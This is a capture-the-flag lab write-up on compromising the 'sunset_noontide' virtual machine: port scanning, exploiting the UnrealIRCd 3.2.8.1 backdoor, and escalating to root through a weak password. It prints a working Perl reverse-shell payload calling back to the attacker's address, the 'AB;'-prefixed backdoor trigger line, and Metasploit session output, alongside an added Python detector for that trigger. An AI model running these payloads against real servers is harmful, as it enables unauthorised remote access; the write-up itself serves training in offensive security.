sunset_noontide Target Machine

Information Gathering

```
┌──(kali㉿kali)-[~/Documents/sunset_noontide]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.150
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 05:25 EDT
Nmap scan report for 192.168.56.150
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
6667/tcp open  irc
6697/tcp open  ircs-u
8067/tcp open  infi-async
MAC Address: 08:00:27:91:A9:5B (Oracle VirtualBox virtual NIC)
```

Three rather unfamiliar ports are open.

```
┌──(kali㉿kali)-[~/Documents/sunset_noontide]
└─$ sudo nmap -sT -sV -sC -O -p6667,6697,8067 192.168.56.150
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 05:26 EDT
Nmap scan report for 192.168.56.150
Host is up (0.00083s latency).

PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd
6697/tcp open  irc     UnrealIRCd
8067/tcp open  irc     UnrealIRCd
MAC Address: 08:00:27:91:A9:5B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.5 (97%), Linux 3.1 (95%), Linux 3.2 (95%), Check Point VPN-1 UTM appliance (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Netgear GS700T- or XS700T-series switch (94%), Linux 2.6.32 (93%), Linux 3.2 - 4.9 (93%), Linux 4.15 - 5.8 (93%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: irc.foonet.com
```

I am not very familiar with the IRC service, but let's finish the usual workflow anyway.

```
┌──(kali㉿kali)-[~/Documents/sunset_noontide]
└─$ sudo nmap --script=vuln -p6667,6697,8067 192.168.56.150
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 05:27 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.150
Host is up (0.00033s latency).

PORT     STATE SERVICE
6667/tcp open  irc
6697/tcp open  ircs-u
| irc-botnet-channels:
|_  ERROR: Closing Link: [192.168.56.106] (Too many unknown connections from your IP)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
8067/tcp open  infi-async
| irc-botnet-channels:
|_  ERROR: Closing Link: [192.168.56.106] (Too many unknown connections from your IP)
MAC Address: 08:00:27:91:A9:5B (Oracle VirtualBox virtual NIC)
```

IRC Exploitation

So IRC is the only way in. I found some related material:

kali/kali服务器攻击/11攻击 Unreal Ircd 服务.md at master · Yehnn/kali (github.com)

Most of them simply use msf directly.

Without msf, the Perl (.pl) exploit script does not work as-is: it has to be edited by hand, substituting your own payload. This trick is also mentioned in the blog linked above.

```
┌──(kali㉿kali)-[~/Documents/sunset_noontide]
└─$ msfvenom -p cmd/unix/reverse_perl LHOST=192.168.56.106 LPORT=443 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 232 bytes
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.106:443");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
```

Next, look at the structure of the original payloads to see how to splice our own in. First, every payload starts with `AB;`, which appears to be the required part. Second, watch the quoting: the single quotes inside the generated code have to be escaped with backslashes.

```perl
my $payload1 = 'AB; perl -MIO -e \'$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.106:443");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};\'';
```
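The `AB;` prefix above is the string the backdoored UnrealIRCd build looks for at the start of a client line, and legitimate IRC traffic never begins a line that way. As an added, defender-side example that is not part of the original write-up, the Python below scans a constructed capture of client-to-server IRC lines and flags any line carrying that trigger; the sample lines and the indicator regex are my own assumptions.

```python
"""Flag UnrealIRCd 3.2.8.1 backdoor trigger lines in captured IRC traffic.

Added example for detection/triage; the capture below is constructed.
"""
import re
from typing import Any, Dict, List

# The backdoor executed the remainder of a client line that began with "AB;".
# Anchoring at line start matters: "AB;" inside a PRIVMSG body is just text.
TRIGGER_RE = re.compile(r"^AB;\s*(?P<cmd>.+)$")

# Heuristic taken from the payload shown in this write-up (assumption: a Perl
# socket reverse shell). Anything else is reported as an unknown command.
PERL_SOCKET_RE = re.compile(r"IO::Socket::INET|-MIO\b")

# Constructed CRLF-terminated client-to-server capture (not real traffic).
SAMPLE_CAPTURE = (
    b"NICK alice\r\n"
    b"USER alice 0 * :Alice\r\n"
    b"AB; perl -MIO -e 'use IO::Socket::INET;'\r\n"
    b"PRIVMSG #chan :AB; appears here as ordinary message text\r\n"
    b"AB;id\r\n"
    b"QUIT :bye\r\n"
)


def split_irc_lines(raw: bytes) -> List[str]:
    """Split a captured byte stream into IRC lines, tolerating bare LF."""
    text = raw.decode("utf-8", errors="replace")
    return [line for line in re.split(r"\r?\n", text) if line]


def classify(cmd: str) -> str:
    """Label the smuggled command for the analyst."""
    return "perl_socket_shell" if PERL_SOCKET_RE.search(cmd) else "unknown_command"


def find_backdoor_triggers(lines: List[str]) -> List[Dict[str, Any]]:
    """Return one finding per line that starts with the AB; trigger."""
    findings: List[Dict[str, Any]] = []
    for line_no, line in enumerate(lines, 1):
        match = TRIGGER_RE.match(line)
        if match:
            cmd = match.group("cmd")
            findings.append({"line_no": line_no, "command": cmd, "kind": classify(cmd)})
    return findings


if __name__ == "__main__":
    for finding in find_backdoor_triggers(split_irc_lines(SAMPLE_CAPTURE)):
        print(finding)
```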

Tested myself: this does return a reverse shell. Let's also try it with msf.

```
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.56.150
RHOSTS => 192.168.56.150
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
RPORT => 6697
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[-] 192.168.56.150:6697 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
```

`show payloads` lists the available payloads. Following the method in the article linked above, I set the payload to cmd/unix/reverse_perl and set LHOST.

```
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.56.106
LHOST => 192.168.56.106
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP handler on 192.168.56.106:4444
[*] 192.168.56.150:6667 - Connected to 192.168.56.150:6667...
    :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
    :irc.foonet.com NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead
[*] 192.168.56.150:6667 - Sending backdoor command...

[*] Command shell session 1 opened (192.168.56.106:4444 -> 192.168.56.150:51882) at 2023-10-09 07:31:46 -0400

whoami
server
id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
uname -a
Linux noontide 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:91:a9:5b brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.150/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 595sec preferred_lft 595sec
    inet6 fe80::a00:27ff:fe91:a95b/64 scope link
       valid_lft forever preferred_lft forever
which python2
which python3
/usr/bin/python3
python3 -c "import pty;pty.spawn('/bin/bash')"
server@noontide:~/irc/Unreal3.2$
server@noontide:~/irc$ cd ..
cd ..
server@noontide:~$ ls
ls
irc  local.txt
server@noontide:~$ cat local.txt
cat local.txt
c53c08b5bf2b0801c5d0c24149826a6e
```

The following Python script can also be used to get a shell; remember to replace LHOST in the script.

Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor: My backdoor script for a vulnerable version of UnrealIRCd (github.com)

I was stuck on privilege escalation for quite a while, trying sensitive files, cron jobs, SUID binaries, shadow file permissions, and information gathering with Linpeas.

Privilege Escalation via Weak Password

Unexpectedly, it was simply a weak root password. I could not help laughing.

```
server@noontide:~/irc/Unreal3.2$ su
su
Password: root

root@noontide:/home/server/irc/Unreal3.2# cd /root
cd /root
root@noontide:~# ls
ls
proof.txt
root@noontide:~# cat proof.txt
cat proof.txt
ab28c8ca8da1b9ffc2d702ac54221105

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
root@noontide:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:91:a9:5b brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.150/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 595sec preferred_lft 595sec
    inet6 fe80::a00:27ff:fe91:a95b/64 scope link
       valid_lft forever preferred_lft forever
root@noontide:~# uname -a
uname -a
Linux noontide 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
root@noontide:~# id
id
uid=0(root) gid=0(root) groups=0(root)
```

Source: https://i3eg1nner.github.io/2023/10/125a16ce3195.html
Author: I3eg1nner
Published: 2023-10-09